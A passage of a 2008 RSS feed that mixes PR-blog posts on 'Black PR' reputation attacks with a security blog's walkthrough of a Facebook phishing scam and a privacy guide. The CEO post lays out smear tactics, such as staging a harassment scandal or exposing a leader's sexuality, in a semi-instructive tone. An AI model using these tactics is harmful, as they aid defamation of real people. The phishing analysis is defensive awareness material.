         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/roadsidepictures/182061567/"><img class="initial-capital" src="http://farm1.static.flickr.com/75/182061567_ce2f71d499_m.jpg?v=0" alt="Fat"/></a><p>In the mood of the upcoming Christmas feasts, here are our tips on how to stay <q>corporate</q> fit during the season. As you know, during this time of the year most companies are quite busy with the execution of various sales campaigns or are rushing to close important deals right before New Year&#8217;s Eve. Christmas also means lots of parties, reunions and gatherings. However, that urge for a fresh start sometimes costs organizations millions as they tend to neglect their competitors and therefore easily become victims of lethal reputation attacks. While many attribute this to an excessive preoccupation during the holidays, many of the Black PR cases are due to the carelessness of managers in assessing security threats and their actual frequency. CEOs also foolishly underestimate the objectives of negative campaigning and refuse to believe that someone will ever dare to affect their <q>flawless</q> corporate systems.</p> <p>I don&#8217;t think it is even worth mentioning here how idiotic this approach is and to be honest many organizations deserve their own reputation misery. So instead of spending quality time with friends and families, many employees end the year setting up crisis teams and fighting bad publicity. Sounds like lots of fun, doesn&#8217;t it?</p> <h3>What is the healthy diet?</h3> <p>First of all, I think it is very important for corporations to understand the power of a good reputation. Although it is not something that you can touch and hold in your hands, having a good name (personal or a brand) is the only thing that matters at the end of the day. 
It not only affects your annual financial reports, but also gives you a competitive edge and a whole new meaning to your marketing strategies, internal relations and sales performance in general. Companies with a strong reputation are more likely to recover from severe crises than the ones with inconstant behavior and a negative image.</p> <p>Secondly, there is a common misunderstanding which I want to clarify. Usually when PRs talk about reputation, they tend to refer to it as a good or bad one. The truth is that the reputation of an organization can be much more colorful as it can take many different shapes or sizes. Keep also in mind that the corporate image means different things for the different stakeholder groups, such as employees, suppliers, shareholders and the media. It is vitally important to keep the balance between them as you risk putting yourself in a very untrustworthy position.</p> <h3>The size always matters</h3> <p>There is no big or small reputation. It is all relative. Companies with <q>big</q> reputations are those with a greater popularity among the general public. This is the case with <a rel="nofollow" target="_blank" href="http://www.thebodyshop.co.uk/">Body Shop.</a> Everyone thinks of Body Shop as a company that is deeply concerned with the environment, fair trading and biologically clean products. This is something that nobody doubts or dares to counter.</p> <p>Organizations with <q>small</q> reputations are those that fail to establish any strong images in the minds of the audience. Usually those are start-ups or corporations with a controversial past and a lack of political protections. Even worse &#8211; firms with no individuality and international media presence.</p> <p>The question here is what will happen when these two types of reputation collide. Obviously it will be much easier for a bigger organization to smash down the smaller one. It has a wider network of connections, more money and a better PR team. 
The smaller competitor won&#8217;t even notice that they are the victim of a Black PR campaign or, even if they do, nobody will believe them or even want to invest in an entity without any market future.</p> <p>However, if a start-up succeeds in the defamation of a bigger company, it will automatically position itself as a better consumer alternative and even secure its own market place. This opportunity is especially seductive for the retail industry. The only difficult thing here is the creation of an effective Black PR strategy and a new marketing plan for after that.</p> <p><em>So, take the tape measure and prepare for the upcoming festivals!</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Britney Spears And The Art of Self-defamation</title>
         <link>http://www.spinhunters.org/blog/britney-spears-and-the-art-of-self-defamation/</link>
         <description>There is a new documentary coming up this weekend on MTV about Britney Spears. It is called Britney: For the Record and it aims to rebuild her reputation after months of a total meltdown. It is expected to be a heart-breaking story about her emotional collapse and the way she completely lost her way to the top. Funny enough, MTV was blamed a year ago that it deliberately helped destroy her image by letting her on stage at the MTV Music Awards 2007. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=134</guid>
         <pubDate>Fri, 21 Nov 2008 12:33:15 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/disier/352614978/"><img class="initial-capital" src="http://farm1.static.flickr.com/139/352614978_801cc5b7dd_m.jpg?v=0" alt="Britney Spears"/></a><p>There is a new documentary coming up this weekend on MTV about Britney Spears. It is called <q><a rel="nofollow" target="_blank" href="http://uk.youtube.com/watch?v=XF64RI6R2h4&#038;feature=related">Britney: For the Record</a></q> and it aims to rebuild her reputation after months of a total meltdown. It is expected to be a heart-breaking story about her emotional collapse and the way she completely lost <q>her way</q> to the top. Funny enough, MTV was blamed a year ago that it deliberately helped destroy her image by letting her on stage at the MTV Music Awards 2007. If you remember well, she was brutally criticized by the tabloids at that time for her poor performance and horrible look, which put Spears into an even deeper depression. Britney easily became a synonym for psychological disorder and a topic of numerous humorous plots. For more than a year people all over the world were literally shocked by her tabloid-chronicled personal spiral that has included rumors of drug and alcohol abuse, a scalp-shearing breakdown, a few trips through rehab, visits from the department of child welfare, and a lot of genital exposure.</p> <h3>What is happening now?</h3> <p>For the last couple of months, the falling pop star suddenly rose from the ashes. It was not something that I expected to occur so soon, at least not with the same magnitude. Today, Britney Spears looks like an entirely different person. She behaves well, spends quality time with her two sons, hits the top charts with a brand new single and even won two MTV awards. Larry Rudolph, her manager, kindly refers to it as <q>the official beginning of the comeback</q>. 
However, I couldn&#8217;t help but wonder, is it really a comeback or a well-designed reputation strategy?</p> <p>There are a few disturbing things which make me reason that Britney Spears&#8217;s breakdown could be part of a complex, self-created Black PR campaign. I know this sounds insane! Who could possibly do this to himself? But if you think about it &#8211; Why NOT???</p> <p>First of all, Britney released her fifth album, <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Blackout_(Britney_Spears_album)">Blackout</a>, right at the peak of her emotional troubles. Ask any reputation advisor and he will tell you that this is a wrong move, especially when you carry such a horrible media karma. That is completely true, but not if your singles are all about depression, self-loss and bad decisions. What would be a better way to promote your label than your own self-destructing life? Keep also in mind that the target audience of the album is mainly composed of teenagers and I don&#8217;t even want to start discussing the emotional problems this particular group has to go through. What I am trying to say is that Britney&#8217;s life may be seen by some as a total wreck, but for others (young troubled girls) it is empathy, etc.</p> <p>On the other hand, people love to see their idols falling down. They want to assure themselves that the celebrities are just regular people like everyone else and have the same domestic and professional problems. This is how I can personally explain the whole hysteria around reality programs and <q>behind the scenes</q> features.</p> <p>Believe me, Britney Spears&#8217; record company knew this extremely well and as a result Blackout set the record for the biggest-selling digital album debut by a female artist in a week.</p> <h3>New Album requires a New Image</h3> <p>The next album of Britney Spears, <q>Circus</q>, is set to be released on 2nd Dec (her birthday). The date is not accidental. 
It should mark her comeback and a new personal stage of life. She will be portrayed as a more mature and emotionally stronger woman and she will probably start aiming at a different type of audience.</p> <p>Britney already looks different. She has better style, a better figure, boosted self-esteem and a professional attitude. She seems quite <q>womanized</q> and at peace with herself. All she needs to do now is to start excusing herself and her recent behavior. She is aiming at people&#8217;s compassion and fortunately for her, we all like to forgive.</p>]]></content:encoded>
      </item>
      <item>
         <title>Collateral Reputation Damage</title>
         <link>http://www.spinhunters.org/blog/collateral-reputation-damage/</link>
         <description>There is a new reputation term I stumbled across yesterday (via Authenticorganizations blog) so I thought it was worth discussing. It is called collateral reputation damage and the idea behind it is that some companies could be incidentally defamed, just by having random similarities with other, less respectable organizations or individuals. According to the author: How does it work? [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=126</guid>
         <pubDate>Wed, 19 Nov 2008 15:09:42 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/freeparking/1229303016/"><img class="initial-capital" src="http://farm2.static.flickr.com/1351/1229303016_6ffc0dda00_m.jpg?v=0" alt="vintage damaged class photo: me in the 1970s"/></a><p>There is a new reputation term I stumbled across yesterday (<a rel="nofollow" target="_blank" href="http://authenticorganizations.com/harquail/2008/11/17/what-is-collateral-reputation-damage/">via Authenticorganizations blog</a>) so I thought it was worth discussing. It is called <q>collateral reputation damage</q> and the idea behind it is that some companies could be incidentally defamed, just by having random similarities with other, less respectable organizations or individuals. According to the author:</p> <blockquote><q>The collateral damage, (is) not intentional damage, because the folks taking action don&#8217;t intend to damage the organization&#8217;s reputation. Instead, the damage occurs through</q> guilt by association</blockquote> <h3>How does it work?</h3> <p>The most popular example of <q>collateral damage</q> is when two similar names (let&#8217;s refer to them as A and B) are being negatively associated with each other. Usually there is no relevant connection between them, except their names, nicknames, corporate symbols or initials. Visual resemblance is also possible. The only requirement here is for one of the subjects (let&#8217;s say A) to have an established bad reputation in people&#8217;s minds. So, every time people hear about the other one, B, they will subconsciously associate it with the negative qualities and characteristics of A. Fortunately, this works only for a very short period of time. 
However, it could be really damaging only if A is in the middle of a corporate/personal scandal.</p> <p>This is what happened with <a rel="nofollow" target="_blank" href="http://www.seriouseats.com/2008/09/palin-syrah-sarah-sara-wine-drops-in-sales.html">Sarah Palin and the Chilean wine <q>Palin Syrah</q></a>. According to Chris Tavelli (a wine bar owner), <q>Palin Syrah</q> was one of the best-selling wines in his pub before her nomination as a Republican V.P. People were constantly put off of its low price and <strong>questionable</strong> quality.</p> <h3>How should the affected party react?</h3> <p>Well, there is no straightforward answer really. Everything depends on the specific situation and whether the affected organization is willing to take any further steps to rebuild its reputation. The main point here is that the harmed company or individual must distance itself from the one with a bad image and make sure to demonstrate different corporate values. If the company publicly complains about its reputation loss and provides enough evidence of it, such as significant financial drops, then it has a real chance to increase its popularity, find new markets or even entirely re-position itself. 
As I always say, it all depends on the abilities of finding an opportunity in the crisis.</p>]]></content:encoded>
      </item>
      <item>
         <title>Analysis of a new Facebook phish</title>
         <link>http://blog.blogsecurify.com/2008/11/analysis-of-new-facebook-phish.html</link>
         <description>&lt;div style="text-align:justify;"&gt;I recently noticed an interesting trend with Facebook. There seems to be an increase in spam and in particular a new type of phishing attempt has emerged that I have been seeing signs of on many different profiles. While phishing via Facebook is &lt;a rel="nofollow" target="_blank" href="http://www.techcrunch.com/2008/01/02/phishing-for-facebook/"&gt;nothing&lt;/a&gt; &lt;a rel="nofollow" target="_blank" href="http://informednetworker.com/blog/2008/08/09/danger-facebook-phish/"&gt;new&lt;/a&gt;, this one is a bit different as the victim is not taken to a website that "looks" like a Facebook login page. This phish uses painfully annoying questions and pop-ups to get you to divulge your account information.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Do not go to any of the URLs mentioned in this article! You have been warned!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="text-align:justify;"&gt;&lt;span style="font-weight:bold;"&gt;How does the phish work?&lt;/span&gt;&lt;br /&gt;You will get an email or notice a wall post from one of your friends in Facebook. Note that your friend that has posted to your wall has had their account compromised or they have really fallen for the scam and have sent links out manually...more on that in a minute. 
&lt;span style="font-weight:bold;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-weight:bold;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;a rel="nofollow" target="_blank" href="http://4.bp.blogspot.com/_TkVLLciT0WE/SSOFtjX82kI/AAAAAAAAACg/0jNffFeQeyw/s1600-h/fb_phish_email.jpg"&gt;&lt;img style="cursor:pointer;width:400px;height:172px;" src="http://4.bp.blogspot.com/_TkVLLciT0WE/SSOFtjX82kI/AAAAAAAAACg/0jNffFeQeyw/s400/fb_phish_email.jpg" alt="" id="BLOGGER_PHOTO_ID_5270203006589917762" border="0"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Initial contact via email notification or wall post (below).&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;img id="BLOGGER_PHOTO_ID_5269829233655820722" style="width:320px;height:59px;" alt="" src="http://3.bp.blogspot.com/_TkVLLciT0WE/SSIxxGsGMbI/AAAAAAAAAA4/tC49tKOSs6M/s320/fb_malware_wallpost.jpg" border="0"/&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Notice the really bad wording of the following:&lt;/div&gt;&lt;div style="font-weight:bold;"&gt;&lt;blockquote&gt;"hey has anyone messaged you to let you know your face book pictre is all over ****.com?"&lt;/blockquote&gt;&lt;/div&gt;&lt;div style="text-align:justify;"&gt;&lt;div style="text-align:justify;"&gt;Notice the bad grammar and misspelling? This should be your first clue that this is a phish and you should not check out this domain no matter how curious you are! 
The bad news is most people will check it out....&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Next, a pop-up will appear showing a link to hxxp://rotating -destination.com.&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;img id="BLOGGER_PHOTO_ID_5269831435402907650" style="width:342px;height:133px;" alt="" src="http://2.bp.blogspot.com/_TkVLLciT0WE/SSIzxQ1gkAI/AAAAAAAAABI/Piv5tuzUQzw/s400/pop-up1.jpg" border="0"/&gt; &lt;div&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;More "enticing" wording for you to click the OK button.&lt;/div&gt;&lt;br /&gt;&lt;div&gt; &lt;/div&gt; &lt;div&gt;Clicking on this pop-up asks you to enter in the name of your friend, your name and your email.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt; &lt;div&gt;&lt;a rel="nofollow" target="_blank" href="http://1.bp.blogspot.com/_TkVLLciT0WE/SSI_-dDnpsI/AAAAAAAAABY/kG0IrxUxPOs/s1600-h/pop-up2.jpg"&gt;&lt;img style="cursor:pointer;width:342px;height:237px;" src="http://1.bp.blogspot.com/_TkVLLciT0WE/SSI_-dDnpsI/AAAAAAAAABY/kG0IrxUxPOs/s400/pop-up2.jpg" alt="" id="BLOGGER_PHOTO_ID_5269844856161150658" border="0"/&gt;&lt;/a&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;&lt;br /&gt;Next, it takes you to this pop-up asking for your password for "registration".&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://1.bp.blogspot.com/_TkVLLciT0WE/SSJAwpY6Q1I/AAAAAAAAABg/zvCK8KuXwZ4/s1600-h/pop-up3.jpg"&gt;&lt;img style="cursor:pointer;width:308px;height:248px;" src="http://1.bp.blogspot.com/_TkVLLciT0WE/SSJAwpY6Q1I/AAAAAAAAABg/zvCK8KuXwZ4/s400/pop-up3.jpg" alt="" id="BLOGGER_PHOTO_ID_5269845718465135442" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;After entering in your password it asks you how you found the site.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://3.bp.blogspot.com/_TkVLLciT0WE/SSJAwxj7N6I/AAAAAAAAABo/o6K4mQB5SzU/s1600-h/pop-up4.jpg"&gt;&lt;img style="cursor:pointer;width:400px;height:162px;" 
src="http://3.bp.blogspot.com/_TkVLLciT0WE/SSJAwxj7N6I/AAAAAAAAABo/o6K4mQB5SzU/s400/pop-up4.jpg" alt="" id="BLOGGER_PHOTO_ID_5269845720658818978" border="0"/&gt;&lt;/a&gt;&lt;div&gt;&lt;br /&gt;Interestingly, if you click on MySpace or Facebook it says it cannot retrieve your image.&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://4.bp.blogspot.com/_TkVLLciT0WE/SSJAw2iMy1I/AAAAAAAAABw/F8yp1zg-Kzc/s1600-h/pop-up5.jpg"&gt;&lt;img style="cursor:pointer;width:329px;height:213px;" src="http://4.bp.blogspot.com/_TkVLLciT0WE/SSJAw2iMy1I/AAAAAAAAABw/F8yp1zg-Kzc/s400/pop-up5.jpg" alt="" id="BLOGGER_PHOTO_ID_5269845721993759570" border="0"/&gt;&lt;/a&gt;&lt;/div&gt; &lt;/div&gt;&lt;br /&gt;After clicking on a link (they all seem to lead to the same place) you will get to a page that tells you that they can't serve content to Facebook/MySpace.&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://4.bp.blogspot.com/_TkVLLciT0WE/SSJAxEM3ApI/AAAAAAAAAB4/-X6iR5F4a-w/s1600-h/pop-up6.jpg"&gt;&lt;img style="cursor:pointer;width:349px;height:128px;" src="http://4.bp.blogspot.com/_TkVLLciT0WE/SSJAxEM3ApI/AAAAAAAAAB4/-X6iR5F4a-w/s400/pop-up6.jpg" alt="" id="BLOGGER_PHOTO_ID_5269845725662347922" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align:justify;"&gt;Clicking the back button you will get another pop-up and after that you have to participate in an online "quiz". It's in a frame and really looks more like the ads you see online (click on the monkey, etc). 
This is the part that will generate ad revenue for the phisher.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://3.bp.blogspot.com/_TkVLLciT0WE/SSJAxA52DFI/AAAAAAAAACA/GAGodbBiUD0/s1600-h/pop-up7.jpg"&gt;&lt;img style="cursor:pointer;width:351px;height:198px;" src="http://3.bp.blogspot.com/_TkVLLciT0WE/SSJAxA52DFI/AAAAAAAAACA/GAGodbBiUD0/s400/pop-up7.jpg" alt="" id="BLOGGER_PHOTO_ID_5269845724777286738" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;After the quiz you get to a screen which says that you have an image waiting for you and gives you a link to click.&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://4.bp.blogspot.com/_TkVLLciT0WE/SSNzy8ULd9I/AAAAAAAAACI/LccIsyYcNlo/s1600-h/pop-up8.jpg"&gt;&lt;img style="cursor:pointer;width:400px;height:75px;" src="http://4.bp.blogspot.com/_TkVLLciT0WE/SSNzy8ULd9I/AAAAAAAAACI/LccIsyYcNlo/s400/pop-up8.jpg" alt="" id="BLOGGER_PHOTO_ID_5270183307975030738" border="0"/&gt;&lt;/a&gt;&lt;div&gt;&lt;br /&gt;Clicking on the link takes you to a site with a picture of a monkey and plays the sound of someone laughing...nice.&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://4.bp.blogspot.com/_TkVLLciT0WE/SSN7dKn6EoI/AAAAAAAAACQ/PNp-DQ1_m74/s1600-h/pop-up9.jpg"&gt;&lt;img style="cursor:pointer;width:300px;height:214px;" src="http://4.bp.blogspot.com/_TkVLLciT0WE/SSN7dKn6EoI/AAAAAAAAACQ/PNp-DQ1_m74/s400/pop-up9.jpg" alt="" id="BLOGGER_PHOTO_ID_5270191729951773314" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Finally, there is a link at the bottom of this picture that takes you to a page telling you how to send this "harmless prank" to your friends....&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://1.bp.blogspot.com/_TkVLLciT0WE/SSN9DXS-4tI/AAAAAAAAACY/UKtZuP6SRyQ/s1600-h/pop-up10.jpg"&gt;&lt;img style="cursor:pointer;width:384px;height:400px;" 
src="http://1.bp.blogspot.com/_TkVLLciT0WE/SSN9DXS-4tI/AAAAAAAAACY/UKtZuP6SRyQ/s400/pop-up10.jpg" alt="" id="BLOGGER_PHOTO_ID_5270193485700326098" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align:justify;"&gt;Not sure if I have seen a phisher actually ask you for help! Makes things even easier for the phish creator. They even tell you to use "regular" email as you don't want Facebook to block you for being a "spammer"...&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align:justify;"&gt;&lt;span style="font-weight:bold;"&gt;What's the end result?&lt;/span&gt;&lt;br /&gt;The victim who goes to this website and enters in all the information requested will get their Facebook and/or MySpace profile hijacked (probably with an automated login script) and most likely their email compromised as well. Unfortunately, most people use the same password for both social media sites and email so this is a rather serious problem. If you or anyone you know fell victim to this phish, I advise changing your social media and email passwords immediately.&lt;br /&gt;&lt;br /&gt;Special thanks to &lt;a rel="nofollow" target="_blank" href="http://securityblahblah.blogspot.com/"&gt;Greg&lt;/a&gt; and &lt;a rel="nofollow" target="_blank" href="http://secshoggoth.blogspot.com/"&gt;Tyler&lt;/a&gt; for helping out with the detailed analysis of this phish. Greg and Tyler do a ton of great malware analysis and they did some research to help determine if this phish was malware related. 
While no malicious downloads were detected in this specific instance, Greg mentions the following additional information about this phish:&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align:justify;"&gt;&lt;ul&gt;&lt;li&gt;The IP of the first domain is associated with 16 domains that have been related to malware in the past (some serving Zlob trojans and one related to bogus blogs) so don't be surprised if this scam gets more aggressive in the future.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;The IP is hosted with Oversee.net which is associated with about 90 instances of malware and rogue software.&lt;/li&gt;&lt;li&gt;There is code in the HTML where a graphic would be served up at 1 pixel x 1 pixel (essentially hidden) but that code is commented out. So at some point that graphic might have had some exploit code or perhaps been used to log your IP.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;span style="font-weight:bold;"&gt;Some thoughts on how not to be a victim&lt;/span&gt;&lt;br /&gt;Here are a few things to remember so you don't become a victim of these and other types of scams:&lt;br /&gt;&lt;ul style="text-align:justify;"&gt;&lt;li&gt;Use a different, complex password for each of your accounts. That way if one password gets compromised all your other accounts don't get compromised as well.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Even if your friends want you to click on links, be cautious! 
You never know if their profiles or email accounts have been hacked!&lt;/li&gt;&lt;li&gt;Look for bad grammar and misspelled words as your first clue to a phish.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Check out the &lt;a rel="nofollow" target="_blank" href="http://spylogic.net/downloads/Facebook_Privacy_and_Security_Guide.pdf"&gt;Facebook Privacy &amp;amp; Security Guide&lt;/a&gt; which gives you some good tips to follow when using social media websites.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (Tom)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-5488672181582333575</guid>
         <pubDate>Mon, 17 Nov 2008 18:20:00 -0800</pubDate>
         <media:thumbnail width="72" url="http://4.bp.blogspot.com/_TkVLLciT0WE/SSOFtjX82kI/AAAAAAAAACg/0jNffFeQeyw/s72-c/fb_phish_email.jpg" height="72" />
      </item>
      <item>
         <title>Top Reputation Nightmares for CEOs</title>
         <link>http://www.spinhunters.org/blog/top-reputation-nightmares-for-ceos/</link>
         <description>Ask any reputation strategist and he will tell you that the most vulnerable asset of any corporation is its very own leader. Actually, a CEO&amp;#8217;s reputation represents around 49%-65% of overall corporate reputation, and thus it is an inevitable part of numerous Black PR scenarios. The reason for this is that it requires much less effort and time to defame a person than to concentrate on the disparagement of an entire organization. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=119</guid>
         <pubDate>Thu, 13 Nov 2008 09:07:26 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/sis/88844769/"><img class="initial-capital" src="http://farm1.static.flickr.com/22/88844769_b775acbabe_m.jpg?v=0" alt="Nobody Loves Me! The Valentine Nightmare."/></a><p>Ask any reputation strategist and he will tell you that the most vulnerable asset of any corporation is its very own leader. Actually, a CEO&#8217;s reputation represents around 49%-65% of overall corporate reputation, and thus it is an inevitable part of numerous Black PR scenarios. The reason for this is that it requires much less effort and time to defame a person than to concentrate on the disparagement of an entire organization.</p> <p>The objectives of the smear campaigns, on the other hand, could also be different. Usually there are two simple goals behind every reputation attack. The first one is directed at the personal qualities of the target and it aims at his official resignation. Most of the time these types of attacks come from inside the company and are used when the leader is no longer suitable for the general corporate performance. It is also very convenient when he/she cannot be dismissed directly or is a great obstacle for someone&#8217;s interest. The second reason for CEO defamation is when the black-hats are trying to distract the attention of the industry&#8217;s stakeholders or are aiming to cause extra trouble for the organization. It is not a surprise that this is a very common situation during important events like new product launches or forthcoming acquisitions.</p> <p>Due to the high volume of recent reputation attacks, I tried to summarize the most common malicious scenarios that CEOs could be involved in. Of course, there are a lot more scenarios than those that I have listed. Keep in mind that everything depends on the creativity of the attacker. The golden rule here is that the more uncommon the plan is, the more effective the results would be.</p> <ol>
<li><strong>Sexual Harassment</strong> &#8211; This is the most popular type of attack that a leader could face. It is quite easy to prove and works almost every time. All you need to do is to find a suitable victim, sufficient evidence and a tabloid editor willing to pay enough for the story. Once the scandal is triggered, you can just sit down and relax.</li>
<li><strong>Hypocrisy</strong> &#8211; The point here is to reveal a discrepancy between the leader&#8217;s official attitude and his actual deeds. The latest example is the Sarah Palin fashion affair. The problem there was not that she likes to wear very expensive, designer clothes, but the fact that she is not a regular American girl as she had been trying to portray herself.</li>
<li><strong>Membership of controversial groups</strong> &#8211; This is a really powerful approach. If you can prove that the CEO is a part of a mob gang, religious cult or secret society, then his media crucifixion will be certain. The corporate long-term strategies will also be affected.</li>
<li><strong>Professional Incompetence</strong> &#8211; If the leader is incapable of making good decisions and taking responsibility for his actions, then the quality of the corporate services will be put under serious suspicion. This is pretty scary for most B2B companies.</li>
<li><strong>Misuse of corporate resources (Embezzlement)</strong> &#8211; Financial wrongdoing and unethical behavior are probably the most significant threats to every corporate reputation. Such is the case with Deyaar&#8217;s ex-CEO, Zack Shahin, who was suspected of embezzling over $33 million into his personal accounts. The scandal broke earlier this year and led to his immediate discharge as the head of the biggest property developer in Dubai. According to the Gulf media sources, the company is still trying to recover its tarnished reputation and to regain the trust of its shareholders.</li>
<p><strong>I want to clarify that the person who was accused of embezzling Deyaar Development&#8217;s resources is Zack Shahin, not Nasser Al-Shaikh as was stated earlier. Mr. Al-Shaikh is the current Chairman of the company and the General Director of the Dubai Department of Finance. Spin Hunters apologizes for any inconvenience we might have caused with this post.
</strong></p>
<li><strong>Indictment</strong> &#8211; When it comes to a CEO&#8217;s reputation, ethical conduct is always on the top. Bernard Ebbers, the former CEO of WorldCom, learned that the hard way when he was indicted on federal charges stemming from the multi-billion dollar accounting fraud at the telecommunications giant. He was also charged with conspiracy and false filing with the Securities Exchange Commission. Today he is serving his sentence at the FCI Oakdale.</li>
<li><strong>Personality and Lifestyle</strong> &#8211; The main goal of the attacker here is to reveal all the dirty secrets of the target that are not publicly known. If the leader is a drug addict, a racist or a homosexual and this type of image is in total clash with the position he holds, then not only the reputation of the organization he is associated with will suffer, but also the reputation of the entire industry itself.</li>
</ol> <p><strong>Bottom Line:</strong> <em>CEO&#8217;s reputation will always be a target of professional smear campaigns. The best thing CEOs can do is to be completely honest and sincere with his PR strategic team, as this is the only way to tackle all pending reputation risks.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Facebook Privacy &amp; Security Guide</title>
         <link>http://blog.blogsecurify.com/2008/11/facebook-privacy-security-guide.html</link>
         <description>&lt;div style="text-align:justify;"&gt;Did you know that the default privacy and security settings in most social network websites are designed to share your personal information with as many people as possible? Did you ever stop to think about how &lt;span style="font-style:italic;"&gt;valuable&lt;/span&gt; your information is to the company that runs your favorite social network website? The more information you share...the more valuable you are. Are you posting too much personal information and could this information be used for things you didn't approve of?&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;div style="text-align:justify;"&gt;&lt;a rel="nofollow" target="_blank" href="http://spylogic.net/downloads/Facebook_Privacy_and_Security_Guide.pdf"&gt;This guide&lt;/a&gt; gives you suggested "baseline" privacy and security settings that you can use when configuring your Facebook account. Obviously, you can adjust these settings based on the level of risk you are comfortable with. However, this guide should give you a good starting point. In addition, I have listed five key tips in the guide that you should keep in mind when using any social network.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Why put this guide together?&lt;/span&gt;&lt;br /&gt;I have been doing several months of research with my own Facebook account as well as gathering the input of other Facebook users to determine what the privacy and security settings should be without losing the key features of using a social network...the networking! I found that most users of Facebook have no idea that these settings even exist! Privacy and security settings can be easily configured to help limit the amount of personal information able to be shared with just about anyone, even outside your friends list.&lt;br /&gt;&lt;br /&gt;Please feel free to distribute this document to friends and family or use it for any security awareness campaigns. 
I will hopefully be keeping up with any updates to the document when Facebook changes things. I might be putting a similar document together for MySpace. However, MySpace has a long way to go compared with Facebook in regards to privacy and security settings.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://spylogic.net/downloads/Facebook_Privacy_and_Security_Guide.pdf"&gt;You can download the latest version of the guide from my blog here.&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (Tom)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-1849366409657454444</guid>
         <pubDate>Wed, 05 Nov 2008 19:18:00 -0800</pubDate>
      </item>
      <item>
         <title>Negative Word-Of-Mouth made easy with Tell-a-Friend</title>
         <link>http://www.spinhunters.org/blog/negative-word-of-mouth-made-easy-with-tell-a-friend/</link>
         <description>There is a new widget that caught my eye the other day and I have been playing with it ever since. It&amp;#8217;s called Tell-a-Friend and its general purpose is to help users to share any type of information without leaving the website where it is installed. Nothing new, you may say, but the point I want to make is that this tool actually enables visitors to access their friends with much greater speed and scope. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=116</guid>
         <pubDate>Tue, 04 Nov 2008 07:51:11 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/nyki_m/3000410746/in/set-72157607040408281/"><img class="initial-capital" src="http://farm4.static.flickr.com/3236/3000410746_3974a1e3c3_m.jpg?v=0" alt="Mouth"/></a><p>There is a new widget that caught my eye the other day and I have been playing with it ever since. It&#8217;s called <a rel="nofollow" target="_blank" href="http://http://tellafriend.socialtwist.com/index.jsp">Tell-a-Friend</a> and its general purpose is to help users to share any type of information without leaving the website where it is installed. Nothing new, you may say, but the point I want to make is that this tool actually enables visitors to access their friends with much greater speed and scope. So, instead of remembering all the contact details of your LinkedIn network, you can now spread your messages with less effort and fewer boring authentication requests. Convenient for some, quite scary for others! Tell-a-Friend is a two-edged sword that can successfully build and destroy your reputation in a matter of minutes. Everything depends on the professional skills of both the black-hats and the reputation management consultants.</p> <p>It is not a surprise that most of the serious PR agencies today design Word-of-Mouth (WOM) strategies as part of their promotion services. They are well aware of the power of peer-to-peer sharing and that most potential customers heavily rely on the advice and 